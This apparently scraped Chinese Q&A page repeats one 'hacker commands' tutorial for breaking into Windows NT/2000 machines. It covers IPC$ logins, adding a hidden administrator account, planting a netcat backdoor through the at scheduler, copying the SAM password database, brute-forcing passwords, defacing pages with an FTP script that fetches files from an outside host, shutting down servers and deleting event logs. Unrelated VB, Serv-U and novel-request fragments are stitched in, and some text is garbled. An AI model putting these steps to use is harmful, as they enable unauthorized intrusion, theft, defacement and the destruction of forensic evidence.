A. 怎样在网上进入别人的操作系统。
如何进入别人的电脑- -
大学时在参加ACCP的电脑编程课程,只是兴趣而已,并没有多么的用心学,对一些乱七八糟的东西比较感兴趣,那时做的最多的就是尝试进入别人的电脑和服务器........
1、取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。
2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。
3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明
4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名
5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入
黑客命令之1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为
127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的*作你必须登陆后才可以用.登陆的方法就在上面.
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用
户.
我们加一个hei的用户密码为lovechina
net user hei lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators hei /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这
里把对方的C盘映射到本地的Z盘.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?
不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,
其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
黑客命令之2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time \\127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at \\127.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它
是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
黑客命令之3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用
户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也
就是肉鸡.
黑客命令之4:FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空
间,国内多的是,如果真的找不到,我给个http://www.51.NET,
不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器
在上传前需要登陆先,这里我们假设FTP服务器是 H, ttp://www.51.NET
用户名是HUCJS,密码是654321
ftp http://www.51.net/
他会要求输入用户,成功后会要求输入密码.----------------------
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\
get c:\index.htm d:\
假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下
put c:\index.htm d:\
黑客命令之5:
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
index.htm \\127.0.0.1\c$\index.htm ----------------------
如果你要复制到D盘下把C改为D,就行了!
index.htm \\127.0.0.1\d$\index.htm ----------------------
如果你要把他复制到WINNT目录里
就要把输入
index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt ----------------------
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在
x:\winnt\repair\sam._ sam._是数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
\\127.0.0.1\admin$\repair\sam._ c:\
黑客命令之7:nbtstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就
要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后
就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都
试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分
析得到的结果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大写。
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name 无效 Status
---------------------------------------------
Registered Registered Registered Registered Registered
Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是
不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用
户。
这里的用户是PENTIUMII。
黑客命令之8:Shutdown
关了对方的NT服务器的命令
Shutdown \\IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大
的损失,要做个有良心的入侵者呀。
黑客命令之10:echo
着名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主
机。
我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”
写入index.htm,有2种方法,大家看看有什么区别。
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如
山,任何日本人不得抵赖!”写进index.htm。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”
加到index.htm里面。
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页
到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器
为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商
会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上
的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
具体的做法:
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的
内容。)
等命令完成时,文件已经下载到你指定的文件里了。
注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给
别人看到你的密码。)
记得要 del c:\cnhack.txt
黑客命令之11:attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件
属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不
行。倒!不过有这个命令就别怕了。
attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读 ----------------------
attrib +r index.htm
这个命令是把index.htm的属性设置为只读。
黑客命令之12:del
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日
志,当然要删除日志啦!想被捉吗。呵呵。
NT的日志有这些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改
成其他盘。
B. vb的webbroswer控件怎么打开本地的.url文件
请看下面的代码:
'程序调用方法
'WebBrowser1.NavigateGetURL(快捷方式路径)
'取得URL里链接的函数
PublicFunctionGetURL(ByValurlPathAsString)AsString
DimFileNumAsInteger
DimIdAsString
DimTemAsString
行侍Id="[InternetShortcut]"'在URL文件中,这是一个标识,在这一句下面就是URL地址
FileNum=FreeFile()
OpenurlPathForInputAs#FileNum
LineInput#FileNum,Tem
IfTem=IdThen'得到标识
LineInput#FileNum,Tem'再读入的一行就是地址
GetURL=Right(Tem,Len(Tem)-4)'把地址头部的URL=去掉,即去掉4个字
Close#FileNum
搜大ExitFunction'退出函数
EndIf
Close#FileNum
'如果没有得到地世带竖址,这里指定一个默认的
GetURL="about:blank"
EndFunction
C. 怎样拥有FTP服务器地址
Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等,功能非常完备。 它具有非常完备的安全特性,支持SSl FTP传输,支持在多个Serv-U和FTP客户端通过SSL加密连接保护您的数据安全等
1. 下载安装Serv-U FTP Server
安装原版软件和汉化补丁,这个过程就不多说了,想必没人不会的。
2. 建立第一个本地FTP服务器
安装完成后程序会自动运行,你也可以在菜单中选择运行。
1、 第一次运行程序,它会弹出设置向导窗口将会带你完成最初的设置
2、 单击"下一步",出现"显示菜单图像"的窗口,问你是否在菜单中显示小图像,看个人喜欢了
3、 单击"下一步",这个窗口是让你在本地第一次运行FTP服务器,只要"下一步"就行了
4、 接下来要你输入你的IP地址。如果你自己有服务器,有固定的IP,那就请输入IP地址,如果你只是在自己电脑上建立FTP,而且又是拨号用户,有的只是动态IP,没有固定IP,那这一步就省了,什么也不要填,Serv-U 会自动确定你的IP地址,"下一步"
5、 在这儿要你输入你的域名。如果你有的话,如:ftp.abc. com ,没有的话,就随便填一个
6、 "下一步",询问你是否允许匿名访问一般说来,匿名访问是以Anonymous为用户名称登录的,无需密码,当然如果你想成立一个会员区什么的,就应该选择"否",不让随便什么人都可以登录,只有许可用户才行,在此我们填"是";
7、 "下一步",问你匿名用户登录到你的电脑时的目录。你可以自己指定一个硬盘上已存在的目录,如F:\temp\xyz;
8、 "下一步",询问你是否要锁定该目录,锁定后,匿名登录的用户将只能认为你所指定的目录(F:\temp\xyz)是根目录,也就是说他只能访问这个目录下的文件和文件夹,这个目录之外就不能访问,对于匿名用户一般填"是"
9、 "下一步",询问你是否创建命名的帐号,也就是说可以指定用户以特定的帐号访问你的FTP,这对于办会员区可很有用哦,你可以对于每个人都创建一个帐号,每个帐号的权限不同,就可以不同程序地限制每个人的权利,方法将在后面讲到,这里选择"是"
10、 "下一步",请你填入所要建立的帐号的名称,如:ldr,
11、 "下一步",请输入密码,如:123
12、 "下一步",询问登录目录是什么,这一步与第7步一样,如:F:\tem
13、 "下一步",询问你是否要锁定该目录,同第8步,这里选择"否"
14、 接下来询问你这次创建的用户的管理员权限,有几项选择:无权限,组管理员,域管理员,只读管理员和系统管理员,每项的权限各不相同;这里选择"系统管理员";
15、 最后一步,点击"完成"就OK了,你有什么需要修改的,可以点"上一步",或者进入Serv-U管理员直接修改。
至此,我们建立了一个域ftp.abc. com ,两个用户,一个Anonymous,一个ldr。
来源:http://ke.haosou.com/doc/5500892-5738035.html
D. mobaxtem上传文件只能一个
mobaxtem上传文件只能一个是因为:比较之前可以上传图像的文件,和无法上传图肢差冲像的文件,可以上传图像的历歼这个文件,之前配置过sftp,服务器可庆拍以和本地互通。
E. 只知道电脑IP,怎么进他电脑(高手进)
1、取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。
2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。
3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明
4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名
5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入
黑客命令之1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们好稿假如你得到的用户是hbx,密码是123456。假设对方IP为
127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的*作你必须登陆后才可以用.登陆的方法就在上面.
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用
户.
我们加一个hei的用户密码为lovechina
net user hei lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators hei /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这
里把对方的C盘映射到本地的Z盘.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?
不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,
其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
黑客命令之2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time \\127.0.0.1
将会返回一个时间,这禅袜敏里假设时间为12:1,现在需要新建一个作业,其ID=1
at \\127.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它
是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
黑客命令之3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用
户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也
就是肉鸡.
黑客命令之4:FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空
间,国内多的是,如果真的找不到,我给个http://www.51.NET,
不错的.当我们申请完后,它会贺枝给用户名,密码,以及FTP服务器
在上传前需要登陆先,这里我们假设FTP服务器是 H, ttp://www.51.NET
用户名是HUCJS,密码是654321
ftp www.51.net
他会要求输入用户,成功后会要求输入密码.----------------------
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\
get c:\index.htm d:\
假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下
put c:\index.htm d:\
黑客命令之5:
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
index.htm \\127.0.0.1\c$\index.htm ----------------------
如果你要复制到D盘下把C改为D,就行了!
index.htm \\127.0.0.1\d$\index.htm ----------------------
如果你要把他复制到WINNT目录里
就要把输入
index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt ----------------------
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在
x:\winnt\repair\sam._ sam._是数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
\\127.0.0.1\admin$\repair\sam._ c:\
黑客命令之7:nbtstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就
要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后
就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都
试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分
析得到的结果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大写。
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name 无效 Status
---------------------------------------------
Registered Registered Registered Registered Registered
Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是
不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用
户。
这里的用户是PENTIUMII。
黑客命令之8:Shutdown
关了对方的NT服务器的命令
Shutdown \\IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大
的损失,要做个有良心的入侵者呀。
黑客命令之10:echo
着名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主
机。
我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”
写入index.htm,有2种方法,大家看看有什么区别。
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如
山,任何日本人不得抵赖!”写进index.htm。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”
加到index.htm里面。
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页
到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器
为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商
会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上
的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
具体的做法:
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的
内容。)
等命令完成时,文件已经下载到你指定的文件里了。
注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给
别人看到你的密码。)
记得要 del c:\cnhack.txt
黑客命令之11:attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件
属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不
行。倒!不过有这个命令就别怕了。
attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读 ----------------------
attrib +r index.htm
这个命令是把index.htm的属性设置为只读。
黑客命令之12:del
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日
志,当然要删除日志啦!想被捉吗。呵呵。
NT的日志有这些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改
成其他盘。
F. 求重生之溺杀txt 谢谢
链接:
简介:恨一个人,那就宠他,将他宠得无判银晌法无天,这样,你便可以掘锋干搏升干净净地站在一边,笑看他自我毁灭。爱一个人,那就宠他,用宠爱折断他的翅膀。。
G. Windows2000日志文件默认位置
日志文件默认位置: 应用程序日志、安全日志、系统日志、DNS日志默认位置:%sys temroot%\sys tem32\config,默认文件大小512KB,管理员都会改变这个默认大小。 安全日志文件:%sys temroot%\sys tem32\config\SecEvent.EVT 系统日志文件:%sys temroot%\sys tem32\config\SysEvent.EVT 应用程碧脊序日志文件:%sys temroot%\sys tem32\config\AppEvent.EVT Internet信息服务FTP日志默认位置:%sys temroot%\sys tem32\logfiles\msftpsvc1\,默认每天一个日志 Internet信息服务WWW日志默认位置:%sys temroot%\sys tem32\logfiles\w3svc1\,默认每天一个日志 Scheler服务日志默认位置:%sys temroot%\schedlgu.txt 以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的: HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog 有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。 Schedluler服务日志在注册表中 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchelingAgent FTP和WWW日志详解: FTP日志和WWW日志默认情况,每天生成一个日志文件,包含了该日的一切记录,文件名通常为ex(年份)(月份)(日期),例如ex001023,就是2000年10月23日产生的日志,用记事本就可直接打开,如下例: #Software: Microsoft Internet Information Services 5.0 (微软IIS5.0) #Version: 1.0 (版本1.0) #Date: 20001023 0315 (服务启动时间日期) #Fields: time cip csmethod csuristem scstatus 0315 127.0.0.1 [1]USER administator 331 (IP地址为127.0.0.1用户名为administator试图登录) 0318 127.0.0.1 [1]PASS – 530 (登录失败) 032:04 127.0.0.1 [1]USER nt 331 (IP地址为127.0.0.1用户名为nt的用户试图登录) 032:06 127.0.0.1 [1]PASS – 530 (登录失败) 032:09 127.0.0.1 [1]USER cyz 331 (IP地址为127.0.0.1用户名为cyz的用户试图登录)陆蚂 0322 127.0.0.1 [1]PASS – 530 (登录失败) 0322 127.0.0.1 [1]USER administrator 331 (IP地址为127.0.0.1用户名为administrator试图登录) 0324 127.0.0.1 [1]PASS – 230 (登录成功) 0321 127.0.0.1 [1]MKD nt 550 (新建目录失败) 0325 127.0.0.1 [1]QUIT – 550 (退出FTP程序) 从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统,换了四次用户名和密码才成功,管理员立即就可以得知管理员的入侵时间、IP地址以及探测的用户名,如上例入侵者最终是用administrator用户名进入的,那么就要考虑更换此用户名的密码,或者重命名administrator用户。 WWW日志 WWW服务同FTP服务一样,产生的日志悔悉渗也是在%sys temroot%\sys tem32\LogFiles\W3SVC1目录下,默认是每天一个日志文件,下面是一个典型的WWW日志文件 #Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 20001023 03:091 #Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent) 20001023 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) 20001023 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) 通过分析第六行,可以看出2000年10月23日,IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口,查看了一个页面iisstart.asp 这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt,有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。 既使你删掉FTP和WWW日志,但是还是会在系统日志和安全日志里记录下来,但是较好的是只显示了你的机器名,并没有你的IP,例如上面几个探测之后,系统日志 将会产生下面的记录: 一眼就能看出2000年10月23日,16点17分,系统因为某些事件出现警告,双击头一个,打开它的属性: 属性里记录了出现警告的原因,是因为有人试图用administator用户名登录,出现一个错误,来源是FTP服务。 同时安全记录里写将同时记下:(Ekin:此图不是此次示例的安全日志) 在上图中可以看到两种图标:钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败,日期为2000年10月18日,时间为1002,这就需要重点观察。 双点第一个失败审核事件的,即得到此事件的详细描述,如下图12所示: 分析上图,我们可以得知有个CYZ的工作站,用administator用户名登录本机,但是因为用户名未知或密码错误(实际为密码错误)未能成功。 另外还有DNS服务器日志,不太重要,就此略过(其实是我没有看过它) 知道了Windows2000日志的详细情况,下面就要学会怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除,而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。 首先要取得Admnistrator密码或Administrators组成员之一,然后Telnet到远程主机,先来试着删除FTP日志: D:\SERVER>del schedlgu.txt D:\SERVER\SchedLgU.Txt 进程无法访问文件,因为另一个程序正在使用此文件。 说过了,后台有服务保护,先把服务停掉! D:\SERVER>net stop "task scheler" 下面的服务依赖于 Task Scheler 服务。 停止Task Scheler 服务也会停止这些服务。 Remote Storage Engine 是否继续此操作? (Y/N) [N]: y Remote Storage Engine 服务正在停止.... Remote Storage Engine 服务已成功停止。 Task Scheler 服务正在停止. Task Scheler 服务已成功停止。 OK,它的服务停掉了,同时也停掉了与它有依赖关系的服务。再来试着删一下! D:\SERVER>del schedlgu.txt D:\SERVER> 没有反应?成功了!下一个是FTP日志和WWW日志,原理都是一样,先停掉相关服务,然后再删日志! D:\SERVER\sys tem32\LogFiles\MSFTPSVC1>del ex*.log D:\SERVER\sys tem32\LogFiles\MSFTPSVC1> 以上操作成功删除FTP日志!再来WWW日志! D:\SERVER\sys tem32\LogFiles\W3SVC1>del ex*.log D:\SERVER\sys tem32\LogFiles\W3SVC1> OK!恭喜,现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:\SERVER\sys tem32\LogFiles\W3SVC1>net stop eventlog 这项服务无法接受请求的 "暂停" 或 "停止" 操作。 KAO,I 服了 U,没办法,它是关键服务。如果不用第三方工具,在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法:打开“控制面板”的“管理工具”中的“事件查看器”(98没有,知道用Win2k的好处了吧),在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单,点击它如下图所示: 输入远程计算机的IP,然后点支烟,等上数十分钟,忍受象死机的折磨,然后打开下图: 选择远程计算机的安全性日志,右键选择它的属性: 点击属性里的“清除日志”按钮,OK!安全日志清除完毕!同样的忍受痛苦去清除系统日志! 目前在不借助第三工具的情况下,能很快,很顺利地清除FTP、WWW还有Schedlgu日志,就是系统日志和安全日志属于Windows2000的严密守护,只能用本地的事件查看器来打开它,因为在图形界面下,加之网速又慢,如果你银子多,时间闲,还是可以清除它的。综上所述,介绍了Windows2000的日志文件以及删除方法,但是你必须是Administrator,注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于 Windows 2000 Professional 计算机,也适用于作为独立服务器或成员服务器运行的 Windows 2000 Server 计算机。 至此,Windows2000安全知识基础讲座完毕,还有几句话要讲,大家也看出来了,虽然FTP等等日志可以很快清除,但是系统日志和安全日志却不是那么快、那么顺利地能删除,如果遇到聪明的管理员,将日志文件转移到另一个地方,那更是难上加难,所以奉劝大家,千万不要拿国内的主机做试验,国内的法律很严呀!今天吃饭时,听说有两个人开玩笑,一个人把另外一个人的东西藏起来了,结果那个人一急,报案了,于是藏东西那个人被判四年刑!!法官说法律是不开玩笑的!!!所以大家一定要牢记这点!(不要说我老生常谈) 如果大家有什么不明白地方,请在光和影子论坛提问!谢谢! 在上图中可以看到两种图标:钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败,日期为2000年10月18日,时间为1002,这就需要重点观察。 双点第一个失败审核事件的,即得到此事件的详细描述,如下图12所示: 分析上图,我们可以得知有个CYZ的工作站,用administator用户名登录本机,但是因为用户名未知或密码错误(实际为密码错误)未能成功。 另外还有DNS服务器日志,不太重要,就此略过(其实是我没有看过它) 知道了Windows2000日志的详细情况,下面就要学会怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除,而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。 首先要取得Admnistrator密码或Administrators组成员之一,然后Telnet到远程主机,先来试着删除FTP日志: D:\SERVER>del schedlgu.txt D:\SERVER\SchedLgU.Txt 进程无法访问文件,因为另一个程序正在使用此文件。 说过了,后台有服务保护,先把服务停掉! D:\SERVER>net stop "task scheler" 下面的服务依赖于 Task Scheler 服务。 停止Task Scheler 服务也会停止这些服务。 Remote Storage Engine 是否继续此操作? (Y/N) [N]: y Remote Storage Engine 服务正在停止.... Remote Storage Engine 服务已成功停止。 Task Scheler 服务正在停止. Task Scheler 服务已成功停止。 OK,它的服务停掉了,同时也停掉了与它有依赖关系的服务。再来试着删一下! D:\SERVER>del schedlgu.txt D:\SERVER> 没有反应?成功了!下一个是FTP日志和WWW日志,原理都是一样,先停掉相关服务,然后再删日志! D:\SERVER\sys tem32\LogFiles\MSFTPSVC1>del ex*.log D:\SERVER\sys tem32\LogFiles\MSFTPSVC1> 以上操作成功删除FTP日志!再来WWW日志! D:\SERVER\sys tem32\LogFiles\W3SVC1>del ex*.log D:\SERVER\sys tem32\LogFiles\W3SVC1> OK!恭喜,现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:\SERVER\sys tem32\LogFiles\W3SVC1>net stop eventlog 这项服务无法接受请求的 "暂停" 或 "停止" 操作。 KAO,I 服了 U,没办法,它是关键服务。如果不用第三方工具,在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法:打开“控制面板”的“管理工具”中的“事件查看器”(98没有,知道用Win2k的好处了吧),在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单,点击它如下图所示: 输入远程计算机的IP,然后点支烟,等上数十分钟,忍受象死机的折磨,然后打开下图: 选择远程计算机的安全性日志,右键选择它的属性: 点击属性里的“清除日志”按钮,OK!安全日志清除完毕!同样的忍受痛苦去清除系统日志! 